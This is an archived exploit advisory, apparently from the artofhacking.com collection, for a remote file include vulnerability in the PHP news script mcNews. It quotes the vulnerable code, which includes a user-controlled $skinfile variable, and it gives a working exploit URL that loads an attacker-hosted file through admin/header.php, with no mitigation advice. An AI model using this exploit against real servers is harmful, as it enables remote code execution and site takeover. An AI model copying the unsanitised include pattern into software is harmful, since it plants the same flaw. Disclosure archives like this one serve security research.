AOH :: HP Unsorted M :: TB12036.HTM

mcNews (skinfile) Remote File Include Vulnerability



mcNews (skinfile) Remote File Include Vulnerability
mcNews (skinfile) Remote File Include Vulnerability



-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...


Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip 
Contact: ilker Kandemir 

info:
/*  MEFISTO  */

-------------------------------------------------------------------------------------------------------------------
Code:
if($voir!='') {
  $skinfile=strstr($skinfile, 'skin');
include ("$skinfile");

-------------------------------------------------------------------------------------------------------------------
Exploit:

http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt? 

-------------------------------------------------------------------------------------------------------------------

Tnx:dumenci,h0tturk,ajann

# MefistoLabs.Com

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.